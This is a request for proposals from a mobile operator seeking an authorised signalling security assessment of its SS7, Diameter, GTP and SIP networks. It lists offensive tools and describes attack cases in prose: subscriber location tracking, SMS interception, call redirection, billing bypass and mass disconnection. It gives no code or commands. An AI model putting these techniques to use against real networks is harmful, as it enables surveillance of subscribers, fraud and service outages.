RFP

Telco Signalling Security Assessment

Introduction
Mobile Network Operators (MNOs) have historically treated all signalling messages received
from outside their internal network as trusted and necessary but the new and evolving scenarios
change this paradigm, creating the need for additional security enforcement features.

The purpose of this Request for Information (RFI) is to allow MNO to understand and evaluate
protection for its customers and business, MNO is required to mitigate these risks and prevent
attacks by monitoring and filtering signalling traffic at the network boundaries
(i.e. the interconnection points towards external signalling mobile networks).

General Conditions
Bidders must specify which chapters of GSMA recommendation is every single assessment
compliant with. Must be but not limited to:

 GSMA IR.82, SS7 attacks Category 1, 2, 3 and 5

 GSMA FS.19 Diameter attacks Category 0, 1, 2 and 3

 GSMA FS.20 GPRS Tunnelling Protocol (GTP) Security - Category 1, 2, 3

 GSMA FS.07, SS7 and SIGTRAN threats

 GSMA FS.11, SS7 Security Monitoring)

 ITU Q.704 (07/96), Specifications of Signalling System No. 7 – Message transfer part:
Signalling network functions and messages.

 ITU Q.713 (03/01), Specifications of Signalling System No. 7 – Signalling connection

control part (SCCP): Signalling connection control part formats and codes.

 ITU Q.773 (06/97), Specifications of Signalling System No. 7 – Transaction capabilities

application part (TCAP): Transactions capabilities formats and encoding.

 3GPP Technical Specification Group Core Network and Terminals; Mobile Application
Part (MAP) specification; Rel-8

 3GPP Technical Specification Group Services and System Aspects; 3G Security; Network
Domain Security; MAP application layer security (Release 7)

 3GPP Technical Specification Group Core Network and Terminals; Study into routing of
MT-SMs via the HPLMN; Rel-7
Compliance with international standards. During a penetration test, experts use technical
materials developed by the Provider and follow generally recognized standards and guidelines
on providing information security, such as:

OSSTMM (Open Source Security Testing Methodology Manual)

NIST SP800-115 (National Institute of Standards and Technology Technical Guide to

Information Security Testing and Assessment)

BSI (British Standards Institution) Penetration Testing Model

WASC (Web Application Security Consortium) Threat Classification v2.0

OWASP (Open Web Application Security Project) Testing Guide

Extensive resources. Experts are welcome to use but not limited to the advanced security
analysis tools, both freeware and commercial:

 WebEngine  OWASP dirbuster

 Application Inspector  Wce/incognito/fgdump/pwdump
 Maltego  Acunetix WVS
 Immunity Canvas (VulnDisco, Agora  Netsparker
Pack, Voip Pack, etc.)  PowerSploit
 Metasploit  PowerShell Empire
 Nmap  Commix
 Nbtscan  Nessus
 THC Hydra/THC PPTP  Mozilla Firefox with installed plugins:
bruter/ncrack/Bruter  Live HTTP headers
 Cain and Abel  Tamper Data
 Wireshark  Cookie Manager+
 Aircrack  Modify Headers
 ike-scan  hackbar
 Yersinia  Burp Suite
 SNScan  ProxyStrike
 Loki  A variety of web browsers (Opera,
 Kali Linux Internet Explorer, Chrome, etc.)
 SIPVicious including outdated versions to analyze
 Network Scanner client-side attacks
 Procdump, PsExec  Other
 SQLmap
 IDA Pro/OllyDbg
Experts conducting the security assessments must be at senior experience level with proven
certification.

Bidders are free to propose other types of assessment that should be described and priced
separately.

It is requested a local instance of Threat monitoring intrusion detection system showing near the
real time attacks and threats on own GUI with 3rd party FW integration option.

Evaluation must cover all MNO´s sites

The results should be presented in a report that covers all the case assessed including call traces.

Report must include recommendation to mitigate identified threats.

Meeting on-site should also be included to present all the results and describe the different
problems identified.

Fraud investigation capabilities must be demonstrated on voice, sms and data side, since it can
be important to conduct such investigation

Strong security assessment IoT capabilities must be demonstrated in order to verify the IoT
security postures in evolving scenario’s

Due to upcoming 5G launching the bidder must show research capabilities to conduct security
assessment and supply chain (security guidelines, security advisory, security roll out testing)

Cross protocol attacks testing capabilities

Simjacker attacks testing capabilities

Ability to conduct Internal and External Security assessments

RFI Requirements
The objective of this RFI is to realize a security signaling assessment on MNO signalling network
including SS7, Diameter, GTP and SIP protocols together with external and internal penetration
tests and Internal security audit.

MNO intention under this RFI is to purchase an overall Security Assessment covering the
following domains:

External and Internal Penetration Testing

The following are mandatory attack cases but not limited for execution during the SS7 security
assessment:

o General Penetration Testing

o DNS Reconnaissance Assessment
o Web Application Security Assessment
o By-passing billing system on-site
o Intranet penetration tests via MNO Data

The work must be carried out using the black-box method. The operations are carried out by the
Service Provider's experts under the conditions a potential attacker may encounter. The
following type of attacker is used for external penetration testing.

A highly-skilled outside attacker acting from the Internet without any privileges in the System
and performing attacks to gain access to one or several MNO´s LAN nodes and obtain privileges
enough to launch an attack against internal components of the System.

Security assessment is designed to detect defects, the exploitation of which needs tools that are
generally available or can be obtained from open sources and specialized sources with limited
access.
 Signaling System Number 7 Protocol level assessment

The following are mandatory attack cases but not limited for execution during the SS7 security
assessment:

o Information Disclosure
o Subscriber Availability Disruption
o Fraud
o Subscriber traffic interception
o Network equipment Dos
o GSMA IR.82 compliance check

To be more specific:

IMSI disclosure. The attack is based on requesting the address of the switch where the
subscriber is located and IMSI. The request is a part of the SMS delivery procedure; it allows the
source network to receive information about the subscriber's location for further routing of the
message. It can be used for unauthorized network exploration.

Subscriber location discovery. The attack is based on an unauthorized request for the
subscriber's location. Received data is used for online billing of the subscriber's terminating calls.
The intruder obtains the CGI, which allows them to determine the subscriber's location to within
hundreds of meters.

Subscriber profile disclosure. The attack is based on the subscriber profile restoration
procedure. The intruder might send a message to restore the subscriber's profile and obtain it.

Service disruption. The attack involves registering the subscriber within a new switch coverage
area. A similar procedure takes place when a subscriber is registered on a roaming partner's
network. If the attack is successful, the subscriber does not receive calls or text messages,
although the subscriber's phone indicates that it has network coverage.

Terminating SMS message interception. False registration of the subscriber allows the
intruder to redirect the subscriber's messages to the intruder's host.

USSD manipulation. The attack allows imitating a legitimate message with a USSD request sent
from VLR to HLR. The most dangerous attack scenario is sending a request for transfer of funds
between subscriber accounts. Some cases that could be tested are as below:

 Account balance disclosure

 Transfer of funds between subscribers’ accounts

Terminating call redirection. The attack is based on replacing MSC/VLR and providing fake
roaming numbers, which allows the intruder to affect routing of voice calls on the operator's
network. For example, the intruder may use this method to redirect the subscriber's terminating
calls or to forward calls to expensive destinations.

Paying category change. The attack is based on changing VLR-CSI parameters in the
subscriber profile that control online billing. If the intruder removes the VLR-CSI parameter, the
subscriber's paying category will be post-paid, and all subsequent calls of the subscriber will
bypass the online billing system.

Originating call redirection. The attack is based on changing a gsmSCF address of the online
billing system in the subscriber's profile. All originating calls will request this address, inserted by
the intruder, for online billing. The intruder might redirect an originating call to another MSISDN

Diameter Protocol level assessment

The following are mandatory attack cases but not limited for execution during the Diameter
security assessment.

o Tests against subscribers (DoS, Location Disclosure, etc)

o Tests against network (DoS, Fuzzing)

To be more specific:

Discovering a subscriber's location. The attack is based on an unauthorized request for

the subscriber's location. Received data is used for real-time tariffing the subscriber's
incoming calls. The intruder obtains ECI and TAC identifiers, which allow them to determine
the subscriber's location with an accuracy of hundreds of meters.

Subscriber's profile disclosure. Because several procedures may contain sending parts of
subscriber’s profile in the answer, attacker can exploit corresponding requests. As a result of
the attack, information from the subscriber's profile will be returned by the network.

Network information disclosure. It is possible to acquire information on the different

nodes in the operator network using Diameter procedures.

Disrupting a subscriber's availability. The attack involves de-registering the subscriber

within old MME coverage zone. As a result of the attack, the subscriber does not receive calls
or SMS, although the phone indicates that it has network coverage. Another option is to
register subscriber within new MME coverage zone. A similar procedure takes place when a
 subscriber is registered in a roaming partner's network. As a result, subscriber can’t use
services of the network.

Disrupting a service availability. The attack involves sending a large number of connection
requests or malformed messages. As a result of the attack, normal operation of the target is
disrupted.

Fraud. This attack is based on removing barring for the subscriber’s services.

GPRS Tunneling Protocol (GTP) Security Assessment

The following are sample attack cases but not limited for execution during the GTP security
assessment.

o Tests for GTPv1

o Tests for GTPv2
o Tests of PS Core

To be more specific:

IMSI brute force. The attack uses a “Send Routing Information for GPRS Request” message
via GRX to obtain a list of valid IMSI for further attacks.

Disconnection of authorized subscribers. The attack involves sending “PDP context

delete” requests to the target GGSN with all TEID listed. The deletion causes all authorized
subscribers on that GGSN (can be 100,000 – 10,000000 subscribers) to be disconnected but
leaves the connection active, preventing new connections from being made.

Blocking connection to the internet. The attack involves swamping the available pool of
PDP tunnels, resulting in authorized subscribers receiving a “No resource available” error.

Internet at the expensive of others. The attack involves using an authorized subscriber’s
IMSI to establish an unauthorized connection to the internet. The subscriber is billed for the
attacker’s internet usage.

Intercepting a subscriber’s data. The attack involves the use of spoofed GSN addresses to
conduct a phishing attack on a subscriber’s data traffic.
 Session Initiation Protocol (SIP) Security Assessment
The following are a high level sample of attack vectors for execution during the SIP security
assessment.

o Authentication manipulation
o Traffic Manipulation
o DoS

To be more specific:

Authentication manipulation. These attacks use a variety of methods, including both checks of
authentication from SIP UE and from SIP Trunk.

The Results of these attacks include:

o Fraud (via masquerading as other subscriber)

o Further attack vector development

Example Authentication Manipulation Attacks to be performed in both SIP UE and SIP Trunks
scenarios include:

o SIP Registration Hijacking

o SIP authentication dictionary attacks
o Digest Cracking
o SIP Caller ID Spoofing
o Media Hijacking

Traffic manipulation. These attacks are aimed at scanning and changing the direction of traffic
flows. Results of these attacks include:

o Disclosure of subscriber’s information

o Disclosure of network information
o Disclosure of information transferred (eavesdropping)
o Fraud, including toll fraud and information fraud
o SPAM

Example Traffic Manipulation Attacks to be performed in both SIP UE and SIP Trunking scenarios
include:

o Call Redirection
o Forced call teardown
o Media injection
Service Availability Disruption. These attacks are aimed impacting network performance.
Results of these attacks include:

o Subscriber loss of service

o General network performance degradation

Example Service availability disruption Attacks to be performed in both SIP UE and SIP Trunking
scenarios include:

o SIP Protocol Flood (INVITE, REGISTER, OPTION)

o SIP DoS (BYE, REGISTER, UNREGISTER)
o Media Plane DoS
o Malformed packets

Internal Device Security Audit

The security analysis goal of MNO telco devices is to detect all vulnerable elements in the
System and in services that support its operation, and to obtain objective and independent
assessment of the current security level.

To achieve this goal, the following objectives must be met:

o Device misconfiguration check

o Reverse engineering assessment
o Identify flaws in the System's information security and operation, assess the probability
of their exploitation by attackers.
o Demonstrate possible vulnerability exploitation techniques
All above security assessments must include compliance check according to GSMA categories:

 Category 1
 Category 2
 Category 3

It should also include but not limited to:

 Abnormal behavior assessment

 By-passing billing charging system evaluation
 Cross-protocol evaluation
 Spoofing evaluation
 SMS Spam and Fraud
 DoS attacks

Upon completion of complex testing, the Customer must receive the final Report on Testing
Results, which must contain but not limited to

 General information about the conducted penetration testing

 The results of the conducted checks
 Conclusions (both detailed and brief for top management)
 Security assessment of the Customer’s security system in terms of both potential attack
vectors and implemented security mechanisms
 A list and description of existing threats
 A graphical representation of detected attack vectors along with assessment of
implementation complexities
 A summary of web application vulnerability analysis and methods for their elimination
 A description of the testing procedure, detected vulnerabilities ranked by severity level,
the exploitation possibility, and consequences
 A list of compromised System components
 Recommendations on how to eliminate the detected vulnerabilities, including
recommendations on hardware reconfiguration, used protection mechanisms and
software, additional measures and protection tools, update installation
 Results of exploitation of several critical vulnerabilities, including information on the
System's privilege level obtained at different stages of the testing
Pre-Qualification
Bidder must detail its Telco Signaling expertise by means of:

 Curricula of the persons involved in the project,

 Participation in GSMA security activities,
 Previous experience on similar activities mainly in our region
 IoT Security assessment knowledge

Decision criteria
The final decision will be based on the following points:

 Audit compliance to GSMA FS.11

 Price
 Bidder experiences and public reputation
 Participation in GSMA security activities
 Presence of local office in Indonesia
 Technical criteria